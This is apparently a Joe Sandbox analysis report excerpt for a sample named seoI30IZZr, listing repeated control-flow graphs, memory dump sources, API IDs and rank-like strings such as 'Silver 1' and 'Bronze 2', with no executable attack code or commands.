7ff786623410-7ff78662341b 2491->2505 2502 7ff7866235ed-7ff786623654 call 7ff78662c970 2498->2502 2503 7ff7866235b2-7ff7866235ca 2498->2503 2508 7ff7866235e8 call 7ff78662cdc0 2503->2508 2509 7ff7866235cc-7ff7866235df 2503->2509 2504->2505 2510 7ff7866233fd-7ff786623409 2504->2510 2511 7ff78662341d-7ff786623431 2505->2511 2512 7ff786623451-7ff786623475 2505->2512 2508->2502 2509->2508 2516 7ff7866235e1-7ff7866235e7 _invalid_parameter_noinfo_noreturn 2509->2516 2510->2505 2518 7ff78662344c call 7ff78662cdc0 2511->2518 2519 7ff786623433-7ff786623446 2511->2519 2522 7ff786623477-7ff78662348b 2512->2522 2523 7ff7866234ab-7ff7866234ea 2512->2523 2516->2508 2518->2512 2519->2477 2519->2518 2524 7ff78662348d-7ff7866234a0 2522->2524 2525 7ff7866234a6 call 7ff78662cdc0 2522->2525 2523->2498 2536 7ff7866234f0-7ff786623504 2523->2536 2524->2478 2524->2525 2525->2523 2540 7ff786622c19 call 7ff78662cdc0 2534->2540 2541 7ff786622c00-7ff786622c13 2534->2541 2543 7ff786622c72-7ff786622d60 call 7ff7865e2c40 2535->2543 2544 7ff786622c41-7ff786622c52 2535->2544 2536->2483 2542 7ff78662350a-7ff78662351d 2536->2542 2588 7ff78662334a-7ff78662334e 2538->2588 2589 7ff7866232de-7ff786623343 call 7ff786601820 2538->2589 2546 7ff78662315d-7ff78662317e 2539->2546 2547 7ff786623134-7ff786623155 2539->2547 2540->2535 2541->2459 2541->2540 2542->2483 2549 7ff78662351f-7ff786623556 _invalid_parameter_noinfo_noreturn * 8 2542->2549 2572 7ff786622dfb-7ff786622dff 2543->2572 2573 7ff786622d66-7ff786622d6d 2543->2573 2551 7ff786622c6d call 7ff78662cdc0 2544->2551 2552 7ff786622c54-7ff786622c67 2544->2552 2555 7ff7866231a9-7ff7866231ca 2546->2555 2556 7ff786623180-7ff7866231a1 2546->2556 2567 7ff786623158 call 7ff7865f3280 2547->2567 2549->2448 2551->2543 2552->2463 2552->2551 2563 7ff7866231cc-7ff7866231ed 2555->2563 2564 7ff7866231f5-7ff78662323a call 7ff7865fc550 2555->2564 2574 7ff7866231a4 call 7ff7865f3280 2556->2574 2583 7ff7866231f0 call 7ff7865f3280 2563->2583 2577 7ff78662323c-7ff78662324d 2564->2577 2578 7ff786623255 2564->2578 2567->2546 2580 7ff786622e32-7ff786622e44 2572->2580 2581 7ff786622e01-7ff786622e0f 2572->2581 2579 7ff786622d70-7ff786622d78 2573->2579 2574->2555 2584 7ff786623250 call 7ff7865f3280 2577->2584 2578->2538 2579->2579 2585 7ff786622d7a-7ff786622d80 2579->2585 2580->2458 2586 7ff786622e2a-7ff786622e2d call 7ff78662cdc0 2581->2586 2587 7ff786622e11-7ff786622e24 2581->2587 2583->2564 2584->2578 2585->2572 2591 7ff786622d82-7ff786622df4 call 7ff786601a40 2585->2591 2586->2580 2587->2467 2587->2586 2588->2491 2590 7ff786623350-7ff78662335d 2588->2590 2589->2588 2594 7ff786623378 call 7ff78662cdc0 2590->2594 2595 7ff78662335f-7ff786623372 2590->2595 2591->2572 2594->2491 2595->2472 2595->2594
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                                                                                                                                                        • String ID: Silver 1
                                                                                                                                                                        • API String ID: 3063020102-920020899
                                                                                                                                                                        • Opcode ID: 7de8baa94a2b5139bd7fc36c1fcf57d6eea0ea34d765e51242e79533c482e765
                                                                                                                                                                        • Instruction ID: e98ffc411f1e436c27657174aebec9e247f07f20bf7f46ce4bc6846f0bb3805b
                                                                                                                                                                        • Opcode Fuzzy Hash: 7de8baa94a2b5139bd7fc36c1fcf57d6eea0ea34d765e51242e79533c482e765
                                                                                                                                                                        • Instruction Fuzzy Hash: 2D82F522F14BC699E721AF35DC413FAA353FF59784FA09332D51C666A5DF28A980CB10
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                                                                                                                                                        • String ID: Silver 2
                                                                                                                                                                        • API String ID: 3063020102-2950641177
                                                                                                                                                                        • Opcode ID: 256c05ba916024294709c92f7e97bb467c8932ce60d4d175e51b59f3b722526a
                                                                                                                                                                        • Instruction ID: 4520b45bfaa62fd3ee7b48b8b20bc94a18b3bcbbd6fdbaded00c188e560baa5a
                                                                                                                                                                        • Opcode Fuzzy Hash: 256c05ba916024294709c92f7e97bb467c8932ce60d4d175e51b59f3b722526a
                                                                                                                                                                        • Instruction Fuzzy Hash: D582F522F14BC699E721AF35DC413FAA353FF59784FA09332D51C666A5DF28A980CB10

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 2260 7ff78662265b-7ff78662283f call 7ff786629f30 call 7ff7865e2c40 2269 7ff7866228e6-7ff7866228fb 2260->2269 2270 7ff786622845-7ff78662284c 2260->2270 2271 7ff78662292e-7ff786622964 call 7ff78661e8c0 2269->2271 2272 7ff7866228fd-7ff78662290b 2269->2272 2273 7ff786622850-7ff786622858 2270->2273 2284 7ff78662296a-7ff786622987 call 7ff786612530 2271->2284 2285 7ff7866229f6-7ff786622a03 2271->2285 2274 7ff78662290d-7ff786622920 2272->2274 2275 7ff786622926-7ff786622929 call 7ff78662cdc0 2272->2275 2273->2273 2277 7ff78662285a-7ff786622860 2273->2277 2274->2275 2278 7ff786623557-7ff78662355d _invalid_parameter_noinfo_noreturn 2274->2278 2275->2271 2277->2269 2281 7ff786622866-7ff7866228df call 7ff786601a40 2277->2281 2283 7ff78662355e-7ff786623564 _invalid_parameter_noinfo_noreturn 2278->2283 2281->2269 2289 7ff786623565-7ff78662356b _invalid_parameter_noinfo_noreturn 2283->2289 2298 7ff786622989 2284->2298 2299 7ff78662298c-7ff7866229a7 call 7ff786629e80 2284->2299 2287 7ff786622a09-7ff786622a1d 2285->2287 2288 7ff786622e4b-7ff786622f02 call 7ff7865e2c40 call 7ff7865fe250 2285->2288 2296 7ff786622a20-7ff786622a48 2287->2296 2320 7ff786622f08-7ff78662311c sinf cosf atan2f sinf cosf sinf cosf sinf cosf sinf cosf call 7ff78662a4b0 * 2 call 7ff7865e2c40 2288->2320 2321 7ff78662337d-7ff7866233ea pow * 2 2288->2321 2293 7ff78662356c-7ff786623572 _invalid_parameter_noinfo_noreturn 2289->2293 2297 7ff786623573-7ff786623579 _invalid_parameter_noinfo_noreturn 2293->2297 2296->2296 2301 7ff786622a4a-7ff786622be8 call 7ff78662bc70 memcpy * 3 call 7ff786629e80 2296->2301 2302 7ff78662357a-7ff786623580 _invalid_parameter_noinfo_noreturn 2297->2302 2298->2299 2309 7ff7866229a9-7ff7866229bd 2299->2309 2310 7ff7866229dd-7ff7866229ef 2299->2310 2364 7ff786622bea-7ff786622bfe 2301->2364 2365 7ff786622c1e-7ff786622c3f 2301->2365 2307 7ff786623581-7ff786623587 _invalid_parameter_noinfo_noreturn 2302->2307 2308 7ff786623588-7ff78662358e _invalid_parameter_noinfo_noreturn 2307->2308 2313 7ff78662358f-7ff78662359f call 7ff78662cdc0 2308->2313 2314 7ff7866229d8 call 7ff78662cdc0 2309->2314 2315 7ff7866229bf-7ff7866229d2 2309->2315 2310->2285 2328 7ff7866235a6-7ff7866235b0 2313->2328 2314->2310 2315->2283 2315->2314 2368 7ff786623258-7ff7866232dc call 7ff786611200 call 7ff786629870 call 7ff7866111a0 2320->2368 2369 7ff786623122-7ff786623132 2320->2369 2334 7ff7866233ec-7ff7866233fb 2321->2334 2335 7ff786623410-7ff78662341b 2321->2335 2332 7ff7866235ed-7ff786623654 call 7ff78662c970 2328->2332 2333 7ff7866235b2-7ff7866235ca 2328->2333 2338 7ff7866235e8 call 7ff78662cdc0 2333->2338 2339 7ff7866235cc-7ff7866235df 2333->2339 2334->2335 2340 7ff7866233fd-7ff786623409 2334->2340 2341 7ff78662341d-7ff786623431 2335->2341 2342 7ff786623451-7ff786623475 2335->2342 2338->2332 2339->2338 2346 7ff7866235e1-7ff7866235e7 _invalid_parameter_noinfo_noreturn 2339->2346 2340->2335 2348 7ff78662344c call 7ff78662cdc0 2341->2348 2349 7ff786623433-7ff786623446 2341->2349 2352 7ff786623477-7ff78662348b 2342->2352 2353 7ff7866234ab-7ff7866234ea 2342->2353 2346->2338 2348->2342 2349->2307 2349->2348 2354 7ff78662348d-7ff7866234a0 2352->2354 2355 7ff7866234a6 call 7ff78662cdc0 2352->2355 2353->2328 2366 7ff7866234f0-7ff786623504 2353->2366 2354->2308 2354->2355 2355->2353 2370 7ff786622c19 call 7ff78662cdc0 2364->2370 2371 7ff786622c00-7ff786622c13 2364->2371 2373 7ff786622c72-7ff786622d60 call 7ff7865e2c40 2365->2373 2374 7ff786622c41-7ff786622c52 2365->2374 2366->2313 2372 7ff78662350a-7ff78662351d 2366->2372 2418 7ff78662334a-7ff78662334e 2368->2418 2419 7ff7866232de-7ff786623343 call 7ff786601820 2368->2419 2376 7ff78662315d-7ff78662317e 2369->2376 2377 7ff786623134-7ff786623155 2369->2377 2370->2365 2371->2289 2371->2370 2372->2313 2379 7ff78662351f-7ff786623556 _invalid_parameter_noinfo_noreturn * 8 2372->2379 2402 7ff786622dfb-7ff786622dff 2373->2402 2403 7ff786622d66-7ff786622d6d 2373->2403 2381 7ff786622c6d call 7ff78662cdc0 2374->2381 2382 7ff786622c54-7ff786622c67 2374->2382 2385 7ff7866231a9-7ff7866231ca 2376->2385 2386 7ff786623180-7ff7866231a1 2376->2386 2397 7ff786623158 call 7ff7865f3280 2377->2397 2379->2278 2381->2373 2382->2293 2382->2381 2393 7ff7866231cc-7ff7866231ed 2385->2393 2394 7ff7866231f5-7ff78662323a call 7ff7865fc550 2385->2394 2404 7ff7866231a4 call 7ff7865f3280 2386->2404 2413 7ff7866231f0 call 7ff7865f3280 2393->2413 2407 7ff78662323c-7ff78662324d 2394->2407 2408 7ff786623255 2394->2408 2397->2376 2410 7ff786622e32-7ff786622e44 2402->2410 2411 7ff786622e01-7ff786622e0f 2402->2411 2409 7ff786622d70-7ff786622d78 2403->2409 2404->2385 2414 7ff786623250 call 7ff7865f3280 2407->2414 2408->2368 2409->2409 2415 7ff786622d7a-7ff786622d80 2409->2415 2410->2288 2416 7ff786622e2a-7ff786622e2d call 7ff78662cdc0 2411->2416 2417 7ff786622e11-7ff786622e24 2411->2417 2413->2394 2414->2408 2415->2402 2421 7ff786622d82-7ff786622df4 call 7ff786601a40 2415->2421 2416->2410 2417->2297 2417->2416 2418->2321 2420 7ff786623350-7ff78662335d 2418->2420 2419->2418 2424 7ff786623378 call 7ff78662cdc0 2420->2424 2425 7ff78662335f-7ff786623372 2420->2425 2421->2402 2424->2321 2425->2302 2425->2424
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                                                                                                                                                        • String ID: Bronze 3
                                                                                                                                                                        • API String ID: 3063020102-3389498335
                                                                                                                                                                        • Opcode ID: 4b672e2804f15eaea134c6cd51ef0b6ac787c16fcc7d627ef993df4e7ec87457
                                                                                                                                                                        • Instruction ID: 45fb593ac9b71772abce98a881bb77b92753f1eda0ffd2d061fbfca453e5c3fa
                                                                                                                                                                        • Opcode Fuzzy Hash: 4b672e2804f15eaea134c6cd51ef0b6ac787c16fcc7d627ef993df4e7ec87457
                                                                                                                                                                        • Instruction Fuzzy Hash: 4A82F522F14BC699E721AF35DC413FAA353FF59784FA09332D51C666A5DF28A980CB10

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 2090 7ff78662264f-7ff78662283f call 7ff786629f30 call 7ff7865e2c40 2099 7ff7866228e6-7ff7866228fb 2090->2099 2100 7ff786622845-7ff78662284c 2090->2100 2101 7ff78662292e-7ff786622964 call 7ff78661e8c0 2099->2101 2102 7ff7866228fd-7ff78662290b 2099->2102 2103 7ff786622850-7ff786622858 2100->2103 2114 7ff78662296a-7ff786622987 call 7ff786612530 2101->2114 2115 7ff7866229f6-7ff786622a03 2101->2115 2104 7ff78662290d-7ff786622920 2102->2104 2105 7ff786622926-7ff786622929 call 7ff78662cdc0 2102->2105 2103->2103 2107 7ff78662285a-7ff786622860 2103->2107 2104->2105 2108 7ff786623557-7ff78662355d _invalid_parameter_noinfo_noreturn 2104->2108 2105->2101 2107->2099 2111 7ff786622866-7ff7866228df call 7ff786601a40 2107->2111 2113 7ff78662355e-7ff786623564 _invalid_parameter_noinfo_noreturn 2108->2113 2111->2099 2119 7ff786623565-7ff78662356b _invalid_parameter_noinfo_noreturn 2113->2119 2128 7ff786622989 2114->2128 2129 7ff78662298c-7ff7866229a7 call 7ff786629e80 2114->2129 2117 7ff786622a09-7ff786622a1d 2115->2117 2118 7ff786622e4b-7ff786622f02 call 7ff7865e2c40 call 7ff7865fe250 2115->2118 2126 7ff786622a20-7ff786622a48 2117->2126 2150 7ff786622f08-7ff78662311c sinf cosf atan2f sinf cosf sinf cosf sinf cosf sinf cosf call 7ff78662a4b0 * 2 call 7ff7865e2c40 2118->2150 2151 7ff78662337d-7ff7866233ea pow * 2 2118->2151 2123 7ff78662356c-7ff786623572 _invalid_parameter_noinfo_noreturn 2119->2123 2127 7ff786623573-7ff786623579 _invalid_parameter_noinfo_noreturn 2123->2127 2126->2126 2131 7ff786622a4a-7ff786622be8 call 7ff78662bc70 memcpy * 3 call 7ff786629e80 2126->2131 2132 7ff78662357a-7ff786623580 _invalid_parameter_noinfo_noreturn 2127->2132 2128->2129 2139 7ff7866229a9-7ff7866229bd 2129->2139 2140 7ff7866229dd-7ff7866229ef 2129->2140 2194 7ff786622bea-7ff786622bfe 2131->2194 2195 7ff786622c1e-7ff786622c3f 2131->2195 2137 7ff786623581-7ff786623587 _invalid_parameter_noinfo_noreturn 2132->2137 2138 7ff786623588-7ff78662358e _invalid_parameter_noinfo_noreturn 2137->2138 2143 7ff78662358f-7ff78662359f call 7ff78662cdc0 2138->2143 2144 7ff7866229d8 call 7ff78662cdc0 2139->2144 2145 7ff7866229bf-7ff7866229d2 2139->2145 2140->2115 2158 7ff7866235a6-7ff7866235b0 2143->2158 2144->2140 2145->2113 2145->2144 2198 7ff786623258-7ff7866232dc call 7ff786611200 call 7ff786629870 call 7ff7866111a0 2150->2198 2199 7ff786623122-7ff786623132 2150->2199 2164 7ff7866233ec-7ff7866233fb 2151->2164 2165 7ff786623410-7ff78662341b 2151->2165 2162 7ff7866235ed-7ff786623654 call 7ff78662c970 2158->2162 2163 7ff7866235b2-7ff7866235ca 2158->2163 2168 7ff7866235e8 call 7ff78662cdc0 2163->2168 2169 7ff7866235cc-7ff7866235df 2163->2169 2164->2165 2170 7ff7866233fd-7ff786623409 2164->2170 2171 7ff78662341d-7ff786623431 2165->2171 2172 7ff786623451-7ff786623475 2165->2172 2168->2162 2169->2168 2176 7ff7866235e1-7ff7866235e7 _invalid_parameter_noinfo_noreturn 2169->2176 2170->2165 2178 7ff78662344c call 7ff78662cdc0 2171->2178 2179 7ff786623433-7ff786623446 2171->2179 2182 7ff786623477-7ff78662348b 2172->2182 2183 7ff7866234ab-7ff7866234ea 2172->2183 2176->2168 2178->2172 2179->2137 2179->2178 2184 7ff78662348d-7ff7866234a0 2182->2184 2185 7ff7866234a6 call 7ff78662cdc0 2182->2185 2183->2158 2196 7ff7866234f0-7ff786623504 2183->2196 2184->2138 2184->2185 2185->2183 2200 7ff786622c19 call 7ff78662cdc0 2194->2200 2201 7ff786622c00-7ff786622c13 2194->2201 2203 7ff786622c72-7ff786622d60 call 7ff7865e2c40 2195->2203 2204 7ff786622c41-7ff786622c52 2195->2204 2196->2143 2202 7ff78662350a-7ff78662351d 2196->2202 2248 7ff78662334a-7ff78662334e 2198->2248 2249 7ff7866232de-7ff786623343 call 7ff786601820 2198->2249 2206 7ff78662315d-7ff78662317e 2199->2206 2207 7ff786623134-7ff786623155 2199->2207 2200->2195 2201->2119 2201->2200 2202->2143 2209 7ff78662351f-7ff786623556 _invalid_parameter_noinfo_noreturn * 8 2202->2209 2232 7ff786622dfb-7ff786622dff 2203->2232 2233 7ff786622d66-7ff786622d6d 2203->2233 2211 7ff786622c6d call 7ff78662cdc0 2204->2211 2212 7ff786622c54-7ff786622c67 2204->2212 2215 7ff7866231a9-7ff7866231ca 2206->2215 2216 7ff786623180-7ff7866231a1 2206->2216 2227 7ff786623158 call 7ff7865f3280 2207->2227 2209->2108 2211->2203 2212->2123 2212->2211 2223 7ff7866231cc-7ff7866231ed 2215->2223 2224 7ff7866231f5-7ff78662323a call 7ff7865fc550 2215->2224 2234 7ff7866231a4 call 7ff7865f3280 2216->2234 2243 7ff7866231f0 call 7ff7865f3280 2223->2243 2237 7ff78662323c-7ff78662324d 2224->2237 2238 7ff786623255 2224->2238 2227->2206 2240 7ff786622e32-7ff786622e44 2232->2240 2241 7ff786622e01-7ff786622e0f 2232->2241 2239 7ff786622d70-7ff786622d78 2233->2239 2234->2215 2244 7ff786623250 call 7ff7865f3280 2237->2244 2238->2198 2239->2239 2245 7ff786622d7a-7ff786622d80 2239->2245 2240->2118 2246 7ff786622e2a-7ff786622e2d call 7ff78662cdc0 2241->2246 2247 7ff786622e11-7ff786622e24 2241->2247 2243->2224 2244->2238 2245->2232 2251 7ff786622d82-7ff786622df4 call 7ff786601a40 2245->2251 2246->2240 2247->2127 2247->2246 2248->2151 2250 7ff786623350-7ff78662335d 2248->2250 2249->2248 2254 7ff786623378 call 7ff78662cdc0 2250->2254 2255 7ff78662335f-7ff786623372 2250->2255 2251->2232 2254->2151 2255->2132 2255->2254
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                                                                                                                                                        • String ID: Bronze 2
                                                                                                                                                                        • API String ID: 3063020102-3170931529
                                                                                                                                                                        • Opcode ID: dbab814025d08f5a63346a91c670f8de48569e9b515047f130df7a9a4a56c434
                                                                                                                                                                        • Instruction ID: e570a2e117f60aa533faa66f798d364dd4275df426335e1244f96d7155970afc
                                                                                                                                                                        • Opcode Fuzzy Hash: dbab814025d08f5a63346a91c670f8de48569e9b515047f130df7a9a4a56c434
                                                                                                                                                                        • Instruction Fuzzy Hash: FC82F522F14BC699E721AF35DC413FAA353FF59784FA09332D51C666A5DF28A980CB10

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1920 7ff786622643-7ff78662283f call 7ff786629f30 call 7ff7865e2c40 1929 7ff7866228e6-7ff7866228fb 1920->1929 1930 7ff786622845-7ff78662284c 1920->1930 1931 7ff78662292e-7ff786622964 call 7ff78661e8c0 1929->1931 1932 7ff7866228fd-7ff78662290b 1929->1932 1933 7ff786622850-7ff786622858 1930->1933 1944 7ff78662296a-7ff786622987 call 7ff786612530 1931->1944 1945 7ff7866229f6-7ff786622a03 1931->1945 1934 7ff78662290d-7ff786622920 1932->1934 1935 7ff786622926-7ff786622929 call 7ff78662cdc0 1932->1935 1933->1933 1937 7ff78662285a-7ff786622860 1933->1937 1934->1935 1938 7ff786623557-7ff78662355d _invalid_parameter_noinfo_noreturn 1934->1938 1935->1931 1937->1929 1941 7ff786622866-7ff7866228df call 7ff786601a40 1937->1941 1943 7ff78662355e-7ff786623564 _invalid_parameter_noinfo_noreturn 1938->1943 1941->1929 1949 7ff786623565-7ff78662356b _invalid_parameter_noinfo_noreturn 1943->1949 1958 7ff786622989 1944->1958 1959 7ff78662298c-7ff7866229a7 call 7ff786629e80 1944->1959 1947 7ff786622a09-7ff786622a1d 1945->1947 1948 7ff786622e4b-7ff786622f02 call 7ff7865e2c40 call 7ff7865fe250 1945->1948 1956 7ff786622a20-7ff786622a48 1947->1956 1980 7ff786622f08-7ff78662311c sinf cosf atan2f sinf cosf sinf cosf sinf cosf sinf cosf call 7ff78662a4b0 * 2 call 7ff7865e2c40 1948->1980 1981 7ff78662337d-7ff7866233ea pow * 2 1948->1981 1953 7ff78662356c-7ff786623572 _invalid_parameter_noinfo_noreturn 1949->1953 1957 7ff786623573-7ff786623579 _invalid_parameter_noinfo_noreturn 1953->1957 1956->1956 1961 7ff786622a4a-7ff786622be8 call 7ff78662bc70 memcpy * 3 call 7ff786629e80 1956->1961 1962 7ff78662357a-7ff786623580 _invalid_parameter_noinfo_noreturn 1957->1962 1958->1959 1969 7ff7866229a9-7ff7866229bd 1959->1969 1970 7ff7866229dd-7ff7866229ef 1959->1970 2024 7ff786622bea-7ff786622bfe 1961->2024 2025 7ff786622c1e-7ff786622c3f 1961->2025 1967 7ff786623581-7ff786623587 _invalid_parameter_noinfo_noreturn 1962->1967 1968 7ff786623588-7ff78662358e _invalid_parameter_noinfo_noreturn 1967->1968 1973 7ff78662358f-7ff78662359f call 7ff78662cdc0 1968->1973 1974 7ff7866229d8 call 7ff78662cdc0 1969->1974 1975 7ff7866229bf-7ff7866229d2 1969->1975 1970->1945 1988 7ff7866235a6-7ff7866235b0 1973->1988 1974->1970 1975->1943 1975->1974 2028 7ff786623258-7ff7866232dc call 7ff786611200 call 7ff786629870 call 7ff7866111a0 1980->2028 2029 7ff786623122-7ff786623132 1980->2029 1994 7ff7866233ec-7ff7866233fb 1981->1994 1995 7ff786623410-7ff78662341b 1981->1995 1992 7ff7866235ed-7ff786623654 call 7ff78662c970 1988->1992 1993 7ff7866235b2-7ff7866235ca 1988->1993 1998 7ff7866235e8 call 7ff78662cdc0 1993->1998 1999 7ff7866235cc-7ff7866235df 1993->1999 1994->1995 2000 7ff7866233fd-7ff786623409 1994->2000 2001 7ff78662341d-7ff786623431 1995->2001 2002 7ff786623451-7ff786623475 1995->2002 1998->1992 1999->1998 2006 7ff7866235e1-7ff7866235e7 _invalid_parameter_noinfo_noreturn 1999->2006 2000->1995 2008 7ff78662344c call 7ff78662cdc0 2001->2008 2009 7ff786623433-7ff786623446 2001->2009 2012 7ff786623477-7ff78662348b 2002->2012 2013 7ff7866234ab-7ff7866234ea 2002->2013 2006->1998 2008->2002 2009->1967 2009->2008 2014 7ff78662348d-7ff7866234a0 2012->2014 2015 7ff7866234a6 call 7ff78662cdc0 2012->2015 2013->1988 2026 7ff7866234f0-7ff786623504 2013->2026 2014->1968 2014->2015 2015->2013 2030 7ff786622c19 call 7ff78662cdc0 2024->2030 2031 7ff786622c00-7ff786622c13 2024->2031 2033 7ff786622c72-7ff786622d60 call 7ff7865e2c40 2025->2033 2034 7ff786622c41-7ff786622c52 2025->2034 2026->1973 2032 7ff78662350a-7ff78662351d 2026->2032 2078 7ff78662334a-7ff78662334e 2028->2078 2079 7ff7866232de-7ff786623343 call 7ff786601820 2028->2079 2036 7ff78662315d-7ff78662317e 2029->2036 2037 7ff786623134-7ff786623155 2029->2037 2030->2025 2031->1949 2031->2030 2032->1973 2039 7ff78662351f-7ff786623556 _invalid_parameter_noinfo_noreturn * 8 2032->2039 2062 7ff786622dfb-7ff786622dff 2033->2062 2063 7ff786622d66-7ff786622d6d 2033->2063 2041 7ff786622c6d call 7ff78662cdc0 2034->2041 2042 7ff786622c54-7ff786622c67 2034->2042 2045 7ff7866231a9-7ff7866231ca 2036->2045 2046 7ff786623180-7ff7866231a1 2036->2046 2057 7ff786623158 call 7ff7865f3280 2037->2057 2039->1938 2041->2033 2042->1953 2042->2041 2053 7ff7866231cc-7ff7866231ed 2045->2053 2054 7ff7866231f5-7ff78662323a call 7ff7865fc550 2045->2054 2064 7ff7866231a4 call 7ff7865f3280 2046->2064 2073 7ff7866231f0 call 7ff7865f3280 2053->2073 2067 7ff78662323c-7ff78662324d 2054->2067 2068 7ff786623255 2054->2068 2057->2036 2070 7ff786622e32-7ff786622e44 2062->2070 2071 7ff786622e01-7ff786622e0f 2062->2071 2069 7ff786622d70-7ff786622d78 2063->2069 2064->2045 2074 7ff786623250 call 7ff7865f3280 2067->2074 2068->2028 2069->2069 2075 7ff786622d7a-7ff786622d80 2069->2075 2070->1948 2076 7ff786622e2a-7ff786622e2d call 7ff78662cdc0 2071->2076 2077 7ff786622e11-7ff786622e24 2071->2077 2073->2054 2074->2068 2075->2062 2081 7ff786622d82-7ff786622df4 call 7ff786601a40 2075->2081 2076->2070 2077->1957 2077->2076 2078->1981 2080 7ff786623350-7ff78662335d 2078->2080 2079->2078 2084 7ff786623378 call 7ff78662cdc0 2080->2084 2085 7ff78662335f-7ff786623372 2080->2085 2081->2062 2084->1981 2085->1962 2085->2084
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2709193332.00007FF7865E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7865E0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
